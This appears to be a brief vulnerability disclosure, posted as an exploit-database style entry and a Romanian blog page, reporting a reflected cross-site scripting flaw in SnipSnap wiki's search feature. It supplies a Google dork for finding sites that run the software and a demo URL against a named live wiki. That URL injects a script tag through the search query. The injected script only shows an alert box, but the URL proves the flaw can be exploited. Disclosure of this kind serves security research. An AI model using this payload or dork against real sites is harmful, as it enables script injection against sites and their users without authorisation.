# Date: 8.02.2012
# Author: Sony
# Software Link: http://snipsnap.org/space/start
# Google Dorks: inurl:/space/start intext:snipsnap
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/snipsnap-cross-site-scripting.html
..................................................................
Well, we have xss in the "search". Yes, it's simple.
Demo:
http://wiki.xdroop.com/space/snipsnap-search?query=%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E
I don't like cross site scripting in the search, because it's a very simple, but well..
0 comentarii:
Trimiteți un comentariu
Rețineți: Numai membrii acestui blog pot posta comentarii.